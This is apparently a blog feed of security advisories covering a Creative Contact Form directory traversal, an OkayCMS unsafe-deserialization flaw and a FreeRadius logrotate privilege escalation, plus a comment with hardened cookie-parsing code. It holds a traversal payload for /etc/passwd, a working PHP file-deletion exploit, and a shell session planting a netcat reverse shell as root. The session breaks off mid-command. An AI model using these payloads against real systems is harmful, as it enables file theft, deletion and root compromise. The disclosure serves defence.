Creative Contact Form: Directory Traversal (CVE-2020-9364) https://tech.feedyourhead.at/content/creative-contact-form-directory-traversal-cve-2020-9364 <span class="field field--name-title field--type-string field--label-hidden">Creative Contact Form: Directory Traversal (CVE-2020-9364)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Identifier: AIT-SA-20200301-01<br /> Target: Creative Contact Form (for Joomla)<br /> Vendor: Creative Solutions<br /> Version: 4.6.2 (before Dec 03 2019)<br /> CVE: CVE-2020-9364<br /> Accessibility: Remote<br /> Severity: High<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h3>Summary</h3> <p>Creative Contact Form is a responsive jQuery contact form for the Joomla content management system.</p> <h3>Vulnerability Description</h3> <p>A directory traversal vulnerability resides in the mailer component of Creative Contact Form for Joomla. An attacker could exploit it to receive arbitrary files from the server via e-mail.</p> <p><em>The vulnerable code is located in "helpers/mailer.php" at line 290:</em></p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;">
if(isset($_POST['creativecontactform_upload'])) {
    if(is_array($_POST['creativecontactform_upload'])) {
        foreach($_POST['creativecontactform_upload'] as $file) {
            // echo $file.'--';
            // $file comes straight from the POST body and is appended to the
            // upload directory without any validation, so "../" sequences
            // escape the intended directory.
            $file_path = JPATH_BASE . '/components/com_creativecontactform/views/creativeupload/files/'.$file;
            // Every resulting path is later attached to the outgoing e-mail.
            $attach_files[] = $file_path;
        }
    }
}
</pre></div> <p>If an attacker puts "../../../../../../../../etc/passwd" into $_POST['creativecontactform_upload'] and enables "Send me a copy", the contact form sends them the content of /etc/passwd via e-mail.</p> <p><em>Note: this vulnerability might not be exploitable in the free version of Creative Contact Form, since it does not allow "Send copy to sender".</em></p> <h3>Vulnerable Versions</h3> <p>Creative Contact Form Personal/Professional/Business 4.6.2 (before Dec 3 2019)</p> <h3>Impact</h3> <p>An unauthenticated attacker could receive any file from the server.</p> <h3>Solution</h3> <p>Update to the current version.</p> <h3>References</h3> <ul> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-9364" target="_blank">https://nvd.nist.gov/vuln/detail/CVE-2020-9364</a></li> <li><a href="https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form">https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form</a></li> </ul> <h3>Vendor Contact Timeline</h3> <table class="ce-table" height="89" width="320"> <tbody> <tr> <td>2019-12-02</td> <td>Contacting the vendor</td> </tr> <tr> <td>2019-12-02</td> <td>Vendor published a fixed version</td> </tr> <tr> <td>2019-03-01</td> <td>Public disclosure</td> </tr> </tbody> </table> </div> <span class="field field--name-uid 
field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Mar 09 2020</span> Mon, 09 Mar 2020 20:59:44 +0000 Hoti 288 at https://tech.feedyourhead.at OkayCMS: Unauthenticated remote code execution https://tech.feedyourhead.at/content/unauthenticated-remote-code-execution-okaycms <span class="field field--name-title field--type-string field--label-hidden">OkayCMS: Unauthenticated remote code execution</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Identifier: AIT-SA-20191129-01<br /> Target: OkayCMS<br /> Vendor: OkayCMS<br /> Version: all versions including 2.3.4<br /> CVE: <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16885">CVE-2019-16885</a><br /> Accessibility: Local<br /> Severity: Critical<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h4>Summary</h4> <p><a href="https://okay-cms.com/">OkayCMS is a simple and functional content management system for an online store.</a></p> <h4>Vulnerability Description</h4> <p>An unauthenticated attacker can upload a webshell by injecting a malicious PHP object via a crafted cookie. This can happen in two places: in “<em>view/ProductsView.php</em>” via the cookie "price_filter", and in “<em>api/Comparison.php</em>” via the cookie "comparison". Both cookies pass untrusted values to unserialize(). The following code shows the vulnerability in “<em>api/Comparison.php</em>”:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;">
// The cookie value is attacker-controlled; unserialize() instantiates
// whatever classes the serialized string names and runs their magic methods.
$items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array();
</pre></div> <p>The unsafe deserialization also occurs in “<em>view/ProductsView.php</em>”:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;">
// Same pattern: the cookie is deserialized without any check at all.
$price_filter = unserialize($_COOKIE['price_filter']);
</pre></div> <h4>Proof of Concept</h4> <p>The following code uses an object of the Smarty component to delete arbitrary files from the web host:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?php</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$argc</span> <span style="color: #339933;">!=</span> <span style="color: #cc66cc;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">print</span> <span style="color: #0000ff;">&quot;usage: <span style="color: #006699; font-weight: 
bold;">$argv[0]</span> &lt;url&gt; &lt;file&gt;<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span> <a href="http://www.php.net/exit"><span style="color: #990000;">exit</span></a><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000088;">$url</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$argv</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$file</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$argv</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">2</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Internal_CacheResource_File <span style="color: #009900;">&#123;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> releaseLock<span style="color: #009900;">&#40;</span>Smarty <span style="color: #000088;">$smarty</span><span style="color: #339933;">,</span> Smarty_Template_Cached <span style="color: #000088;">$cached</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">is_locked</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">false</span><span style="color: #339933;">;</span> <span style="color: #339933;">@</span><a href="http://www.php.net/unlink"><span style="color: #990000;">unlink</span></a><span 
style="color: #009900;">&#40;</span><span style="color: #000088;">$cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">lock_id</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Template_Cached <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$handler</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$is_locked</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$lock_id</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;&quot;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __construct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">lock_id</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$GLOBALS</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">handler</span> <span 
style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Internal_CacheResource_File<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$cache_locking</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Internal_Template <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$smarty</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$cached</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __construct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty<span style="color: #339933;">;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span> <span 
style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Template_Cached<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __destruct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cache_locking</span> <span style="color: #339933;">&amp;&amp;</span> <a href="http://www.php.net/isset"><span style="color: #990000;">isset</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">is_locked</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">handler</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">releaseLock</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span><span style="color: #339933;">,</span> <span style="color: 
#000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000088;">$obj</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Internal_Template<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$serialized</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/serialize"><span style="color: #990000;">serialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$obj</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$un</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$serialized</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$headers</span> <span style="color: #339933;">=</span> <span style="color: #009900;">&#91;</span> <span style="color: #0000ff;">'Accept-Language: en-US,en;q=0.5'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;Referer: <span style="color: #006699; font-weight: bold;">$url</span>/en/catalog/myagkie-igrushki&quot;</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'Cookie: '</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">'price_filter='</span> <span style="color: #339933;">.</span> <a href="http://www.php.net/urlencode"><span style="color: 
#990000;">urlencode</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$serialized</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">';'</span> <span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$curl</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/curl_init"><span style="color: #990000;">curl_init</span></a><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.php.net/curl_setopt_array"><span style="color: #990000;">curl_setopt_array</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #339933;">,</span> <span style="color: #009900;">&#91;</span> CURLOPT_HTTPHEADER <span style="color: #339933;">=&gt;</span> <span style="color: #000088;">$headers</span><span style="color: #339933;">,</span> CURLOPT_RETURNTRANSFER <span style="color: #339933;">=&gt;</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">,</span> CURLOPT_URL <span style="color: #339933;">=&gt;</span> <span style="color: #0000ff;">&quot;<span style="color: #006699; font-weight: bold;">$url</span>/en/catalog/myagkie-igrushki/sort-price&quot;</span><span style="color: #339933;">,</span> CURLOPT_USERAGENT <span style="color: #339933;">=&gt;</span> <span style="color: #0000ff;">'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'</span> <span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$resp</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/curl_exec"><span style="color: #990000;">curl_exec</span></a><span style="color: #009900;">&#40;</span><span style="color: 
#000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.php.net/curl_error"><span style="color: #990000;">curl_error</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">print</span> <a href="http://www.php.net/curl_error"><span style="color: #990000;">curl_error</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <a href="http://www.php.net/curl_close"><span style="color: #990000;">curl_close</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; &nbsp; <span style="color: #b1b100;">print</span> <span style="color: #000088;">$resp</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div> <h4>Notes</h4> <p>Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.</p> <h4>Vulnerable Versions</h4> <p>All versions of the “Lite”-branch including 2.3.4. 
Pro versions prior to 3.0.2 might have been affected too.</p> <h4>Tested Versions</h4> <p>OkayCMS-Lite 2.3.4</p> <h4>Impact</h4> <p>An unauthenticated attacker could upload a webshell to the server and execute commands remotely.</p> <h4>Mitigation</h4> <p>At the time of this publication the vendor has only patched the paid version of the CMS, so switching to other free software or upgrading to the Pro version of OkayCMS is recommended.</p> <h4>Vendor Contact Timeline</h4> <table class="ce-table"> <tbody> <tr> <td>2019-08-29</td> <td>Contacting the vendor</td> </tr> <tr> <td>2019-09-04</td> <td>Vendor replied</td> </tr> <tr> <td>2019-09-17</td> <td>Vendor released commercial version 3.0.2 including a bugfix</td> </tr> <tr> <td>2019-09-29</td> <td>Public disclosure</td> </tr> </tbody> </table> <h4>Advisory URL</h4> <p><a href="https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms">https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 02 2019</span> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> 
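<p>Hardened handling of the two cookies from the OkayCMS advisory above, added here as an example and not taken from OkayCMS: the cookie state is carried as JSON and validated field by field, and a transitional reader shows how unserialize() can be kept for old cookies with object instantiation switched off. The min/max fields of "price_filter" and the product-id list in "comparison" are assumptions about what those cookies hold.</p>

```php
<?php
// Added example, not OkayCMS code. Safe replacements for
//   $price_filter = unserialize($_COOKIE['price_filter']);
//   $items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array();
// Assumption: "price_filter" holds a min/max price pair and "comparison"
// holds a list of product ids. Neither cookie ever needs to carry an object.

declare(strict_types=1);

/**
 * Read the price filter cookie as JSON and accept only two numeric bounds.
 * A missing cookie, PHP-serialized data or unexpected keys yield the default.
 */
function read_price_filter(array $cookies): array
{
    $default = ['min' => null, 'max' => null];
    if (!isset($cookies['price_filter']) || !is_string($cookies['price_filter'])) {
        return $default;
    }
    // Depth 2: a flat object only; nested structures are rejected.
    $decoded = json_decode($cookies['price_filter'], true, 2);
    if (!is_array($decoded)) {
        return $default;
    }
    $filter = $default;
    foreach (['min', 'max'] as $key) {
        if (isset($decoded[$key]) && is_numeric($decoded[$key]) && $decoded[$key] >= 0) {
            $filter[$key] = (float) $decoded[$key];
        }
    }
    if ($filter['min'] !== null && $filter['max'] !== null && $filter['min'] > $filter['max']) {
        return $default;
    }
    return $filter;
}

/**
 * Read the comparison cookie as a JSON list of positive integer product ids.
 * The list is capped so one cookie cannot force thousands of product lookups.
 */
function read_comparison(array $cookies, int $maxItems = 20): array
{
    if (empty($cookies['comparison']) || !is_string($cookies['comparison'])) {
        return [];
    }
    $decoded = json_decode($cookies['comparison'], true, 2);
    if (!is_array($decoded)) {
        return [];
    }
    $ids = [];
    foreach ($decoded as $value) {
        if (is_int($value) && $value > 0) {
            $ids[$value] = true; // de-duplicates ids
        }
        if (count($ids) >= $maxItems) {
            break;
        }
    }
    return array_keys($ids);
}

/**
 * Drop every object (including __PHP_Incomplete_Class) from a decoded array.
 */
function strip_objects(array $value): array
{
    $clean = [];
    foreach ($value as $k => $v) {
        if (is_array($v)) {
            $clean[$k] = strip_objects($v);
        } elseif (!is_object($v)) {
            $clean[$k] = $v;
        }
    }
    return $clean;
}

/**
 * Transitional reader for cookies written by older versions that still used
 * serialize(): allowed_classes=false (PHP 7.0+) turns every object in the
 * payload into __PHP_Incomplete_Class, so no constructor, __wakeup() or
 * __destruct() of an attacker-chosen class runs. Objects are then removed,
 * leaving only scalars and arrays.
 */
function unserialize_data_only(string $raw): array
{
    $value = @unserialize($raw, ['allowed_classes' => false]);
    return is_array($value) ? strip_objects($value) : [];
}

// Constructed demo input: one legitimate cookie set and one that carries
// PHP-serialized objects of the kind the advisory describes.
$good = ['price_filter' => '{"min":10,"max":250}', 'comparison' => '[5,9,5,12]'];
$bad  = ['price_filter' => 'O:8:"stdClass":0:{}', 'comparison' => 'a:1:{i:0;O:8:"stdClass":0:{}}'];

var_dump(read_price_filter($good));                   // min 10.0, max 250.0
var_dump(read_comparison($good));                     // [5, 9, 12]
var_dump(read_price_filter($bad));                    // defaults: both null
var_dump(unserialize_data_only($bad['comparison']));  // [] - the object never ran
```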
</section> Mon, 02 Dec 2019 18:25:19 +0000 Hoti 284 at https://tech.feedyourhead.at FreeRadius: Privilege Escalation via Logrotate https://tech.feedyourhead.at/content/privilege-escalation-via-logrotate-freeradius <span class="field field--name-title field--type-string field--label-hidden">FreeRadius: Privilege Escalation via Logrotate</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h2>Identifier: AIT-SA-20191112-01</h2> <p>Target: FreeRadius<br /> Vendor: FreeRadius<br /> Version: all versions including 3.0.19<br /> Fixed in Version: 12.2.3, 12.1.8 and 12.0.8<br /> CVE: <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">CVE-2019-10143</a><br /> Accessibility: Local<br /> Severity: Low<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h4>Summary</h4> <p><a href="https://freeradius.org/">FreeRadius is a modular open-source RADIUS suite.</a></p> <h4>Vulnerability Description</h4> <p>The log directory “radacct” is owned by the user "radiusd". User “radiusd” can elevate privileges to “root” because of an unsafe interaction with logrotate.<br /> User “radiusd” owns the log directory <em>/var/log/radius/radacct</em>:</p> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">
drwx------. 3 radiusd radiusd 4096 26. Apr 16:01 /var/log/radius/radacct/
</pre></div> <p>Log files are rotated once a day (or at any other configured frequency) by logrotate, which runs as root. The configuration does not use the “su” directive:</p> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">
/var/log/radius/radacct/*/detail {
    monthly
    rotate 4
    nocreate
    missingok
    compress
}
</pre></div> <p>Since logrotate is prone to a race condition (see <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a>), it is possible for user "radiusd" to replace the directory /var/log/radius/radacct/logdir with a symbolic link to any directory (for example /etc/bash_completion.d). logrotate will then place the compressed files AS ROOT into /etc/bash_completion.d and set the owner and group to "radiusd.radiusd". An attacker could simply place a reverse shell into this file. 
As soon as root logs in, the reverse shell is executed.</p> <p>Details of the race condition in logrotate can be found at:</p> <ul> <li><a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a></li> <li><a href="https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges">https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges</a></li> <li><a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></li> </ul> <h4>Proof of Concept</h4> <p>The following example illustrates how an attacker who has already gained a shell as user “radiusd” can elevate privileges to “root”. After downloading and compiling, the exploit is executed and waits until the next daily run of logrotate. If the rotation of the log file succeeds, a new file containing the reverse shell payload is written into /etc/bash_completion.d/ with owner “radiusd”. As soon as root logs in, the reverse shell is executed and opens a shell on the attacker's netcat listener:</p> <p><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">git clone</span> https:<span style="color: #000000; font-weight: bold;">//</span>github.com<span style="color: #000000; font-weight: bold;">/</span>whotwagner<span style="color: #000000; font-weight: bold;">/</span>logrotten.git <span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten Cloning into <span style="color: #ff0000;">'/tmp/logrotten'</span>... remote: Enumerating objects: <span style="color: #000000;">84</span>, done. 
remote: Counting objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">84</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">84</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. remote: Compressing objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">58</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">58</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. remote: Total <span style="color: #000000;">84</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span>delta <span style="color: #000000;">35</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, reused <span style="color: #000000;">64</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span>delta <span style="color: #000000;">24</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, pack-reused <span style="color: #000000;">0</span> Unpacking objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">84</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">84</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. 
<span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">mkdir</span> <span style="color: #660033;">-p</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">touch</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #000000; font-weight: bold;">&amp;&amp;</span> <span style="color: #c20cb9; font-weight: bold;">gcc</span> <span style="color: #660033;">-o</span> logrotten logrotten.c radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ .<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #660033;">-c</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: 
bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail Waiting <span style="color: #000000; font-weight: bold;">for</span> rotating <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail... Renamed <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail with <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail2 and created symlink to <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d Done<span style="color: #000000; font-weight: bold;">!</span> radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ <span style="color: #c20cb9; font-weight: bold;">ls</span> <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: 
bold;">/</span> total <span style="color: #000000;">20</span> <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> root root <span style="color: #000000;">11144</span> Oct <span style="color: #000000;">28</span> <span style="color: #000000;">2018</span> grub <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> radiusd radiusd <span style="color: #000000;">33</span> May <span style="color: #000000;">12</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">44</span> detail.1.gz radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;if [ \<span style="color: #780078;">`id -u\`</span> -eq 0 ]; then (/bin/nc -e /bin/bash localhost 3333 &amp;); fi&quot;</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span>detail.1.gz radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ nc 